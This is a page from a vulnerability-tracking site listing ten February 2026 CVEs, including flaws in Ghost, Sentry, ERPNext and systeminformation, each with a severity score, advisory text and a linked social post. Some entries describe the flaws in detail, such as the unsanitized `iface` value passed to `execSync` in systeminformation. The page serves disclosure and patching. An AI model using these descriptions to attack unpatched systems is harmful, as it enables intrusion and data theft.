24h | 7d | 30d

Overview

  • TryGhost
  • Ghost

20 Feb 2026
Published
20 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.4)
EPSS
0.07%

KEV

Description

Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.

Statistics

  • 1 Post

Last activity: 23 hours ago

Bluesky

Profile picture fallback
📌 CVE-2026-26980 - Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the datab... https://www.cyberhub.blog/cves/CVE-2026-26980
  • 0
  • 0
  • 0
  • 23h ago

Overview

  • JonathanWilbur
  • asn1-ts

21 Feb 2026
Published
21 Feb 2026
Updated

CVSS v4.0
CRITICAL (9.2)
EPSS
0.04%

KEV

Description

ASN.1 TypeScript ESM library, including codecs for Basic Encoding Rules (BER) and Distinguished Encoding Rules (DER). In versions 11.0.5 and below, in some cases, decoding an INTEGER could leak the underlying ArrayBuffer. This issue is expected to be fixed in version 11.0.6.

Statistics

  • 1 Post

Last activity: 11 hours ago

Fediverse

Profile picture fallback

🛡️ CRITICAL: CVE-2026-27452 in JonathanWilbur asn1-ts (<=11.0.5) — Decoding INTEGERs may leak ArrayBuffer, exposing sensitive data. Upgrade to 11.0.6 urgently. Details: radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 11h ago

Overview

  • pnggroup
  • libpng

10 Feb 2026
Published
11 Feb 2026
Updated

CVSS v4.0
HIGH (8.3)
EPSS
0.06%

KEV

Description

LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user's display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification. This vulnerability is fixed in 1.6.55.

Statistics

  • 1 Post

Last activity: 6 hours ago

Bluesky

Profile picture fallback
🚨 Urgent: #Fedora 42/43 mingw-libpng update addresses CVE-2026-25646—a critical heap overflow in png_set_quantize. If you cross-compile Windows apps, patch now to avoid shipping vulnerable binaries. Read more: 👉 tinyurl.com/377ctus3 #Security
  • 0
  • 0
  • 0
  • 6h ago

Overview

  • Pending

19 Feb 2026
Published
19 Feb 2026
Updated

CVSS
Pending
EPSS
0.02%

KEV

Description

A user enumeration vulnerability exists in FormaLMS 4.1.18 and below in the password recovery functionality accessible via the /lostpwd endpoint. The application returns different error messages for valid and invalid usernames allowing an unauthenticated attacker to determine which usernames are registered in the system through observable response discrepancy.

Statistics

  • 1 Post

Last activity: 19 hours ago

Bluesky

Profile picture fallback
CVE-2026-26744: How a Small Bug Bump Can Lead to Big Security Wins + Video Introduction: In the world of cybersecurity, not every vulnerability leads to a system-wide compromise or makes headlines. However, the discovery and disclosure of even minor flaws are the bedrock of a resilient digital…
  • 0
  • 0
  • 0
  • 19h ago

Overview

  • getsentry
  • sentry

21 Feb 2026
Published
21 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.1)
EPSS
0.04%

KEV

Description

Sentry is a developer-first error tracking and performance monitoring tool. Versions 21.12.0 through 26.1.0 have a critical vulnerability in its SAML SSO implementation which allows an attacker to take over any user account by using a malicious SAML Identity Provider and another organization on the same Sentry instance. Self-hosted users are only at risk if the following criteria is met: ore than one organizations are configured (SENTRY_SINGLE_ORGANIZATION = True), or malicious user has existing access and permissions to modify SSO settings for another organization in a multo-organization instance. This issue has been fixed in version 26.2.0. To workaround this issue, implement user account-based two-factor authentication to prevent an attacker from being able to complete authentication with a victim's user account. Organization administrators cannot do this on a user's behalf, this requires individual users to ensure 2FA has been enabled for their account.

Statistics

  • 1 Post

Last activity: 13 hours ago

Fediverse

Profile picture fallback

🚨 Critical SAML SSO vuln (CVE-2026-27197, CVSS 9.1) in Sentry 21.12.0 – 26.1.0 allows remote account takeover in multi-org instances. Upgrade to 26.2.0+, enable user 2FA, audit SSO settings! Full details: radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 13h ago

Overview

  • GetSimpleCMS-CE
  • GetSimpleCMS-CE

20 Feb 2026
Published
20 Feb 2026
Updated

CVSS v4.0
HIGH (7.1)
EPSS
0.02%

KEV

Description

GetSimple CMS is a content management system. All versions of GetSimple CMS do not implement CSRF protection on the administrative file upload endpoint. As a result, an attacker can craft a malicious web page that silently triggers a file upload request from an authenticated victim’s browser. The request is accepted without requiring a CSRF token or origin validation. This allows an attacker to upload arbitrary files to the application without the victim’s knowledge or consent. In order to exploit this vulnerability, the victim must be authenticated to GetSimple CMS (e.g., admin user), and visit an attacker-controlled webpage. This issue does not have a fix at the time of publication.

Statistics

  • 1 Post

Last activity: 6 hours ago

Bluesky

Profile picture fallback
How I found CVE-2026–27146 (CSRF)| Cyber Tamarin https://cybertamarin.medium.com/how-i-found-cve-2026-27146-cyber-tamarin-a2886542db22?source=rss------bug_bounty-5
  • 0
  • 0
  • 0
  • 6h ago

Overview

  • frappe
  • erpnext

21 Feb 2026
Published
21 Feb 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
0.04%

KEV

Description

ERP is a free and open source Enterprise Resource Planning tool. In versions up to 15.98.0 and 16.0.0-rc.1 and through 16.6.0, certain endpoints lacked access validation which allowed for unauthorized document access. This issue has been fixed in versions 15.98.1 and 16.6.1.

Statistics

  • 1 Post

Last activity: 10 hours ago

Fediverse

Profile picture fallback

🚨 CRITICAL: CVE-2026-27471 in ERPNext (≤15.98.0, 16.0.0-rc.1 – 16.6.0) lets unauth attackers access sensitive docs via missing API auth. Upgrade to 15.98.1/16.6.1+ & restrict access now. radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 10h ago

Overview

  • Red Hat
  • Red Hat Enterprise Linux 10
  • gnutls

09 Feb 2026
Published
18 Feb 2026
Updated

CVSS
Pending
EPSS
0.04%

KEV

Description

A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).

Statistics

  • 1 Post

Last activity: 7 hours ago

Bluesky

Profile picture fallback
#Mageia 2026-0045 addresses a high-severity GnuTLS flaw (CVE-2025-14831). This isn't just a patch; it's a compliance and operational necessity. Read more: 👉 tinyurl.com/266b8u85 #Security
  • 0
  • 0
  • 0
  • 7h ago

Overview

  • sebhildebrandt
  • systeminformation

19 Feb 2026
Published
19 Feb 2026
Updated

CVSS v3.1
HIGH (8.4)
EPSS
0.06%

KEV

Description

systeminformation is a System and OS information library for node.js. In versions prior to 5.30.8, a command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path. In `lib/wifi.js`, the `wifiNetworks()` function sanitizes the `iface` parameter on the initial call (line 437). However, when the initial scan returns empty results, a `setTimeout` retry (lines 440-441) calls `getWifiNetworkListIw(iface)` with the **original unsanitized** `iface` value, which is passed directly to `execSync('iwlist ${iface} scan')`. Any application passing user-controlled input to `si.wifiNetworks()` is vulnerable to arbitrary command execution with the privileges of the Node.js process. Version 5.30.8 fixes the issue.

Statistics

  • 1 Post

Last activity: 15 hours ago

Bluesky

Profile picture fallback
📌 CVE-2026-26280 - systeminformation is a System and OS information library for node.js. In versions prior to 5.30.8, a command injection vulnerability in the `wifiNetwo... https://www.cyberhub.blog/cves/CVE-2026-26280
  • 0
  • 0
  • 0
  • 15h ago

Overview

  • Bixat
  • RustFly

19 Feb 2026
Published
20 Feb 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
0.27%

KEV

Description

RustFly 2.0.0 contains a command injection vulnerability in its remote UI control mechanism that accepts hex-encoded instructions over UDP port 5005 without proper sanitization. Attackers can send crafted hex-encoded payloads containing system commands to execute arbitrary operations on the target system, including reverse shell establishment and command execution.

Statistics

  • 1 Post

Last activity: 5 hours ago

Bluesky

Profile picture fallback
📌 CVE-2026-27476 - RustFly 2.0.0 contains a command injection vulnerability in its remote UI control mechanism that accepts hex-encoded instructions over UDP port 5005 w... https://www.cyberhub.blog/cves/CVE-2026-27476
  • 0
  • 0
  • 0
  • 5h ago
Showing 11 to 20 of 55 CVEs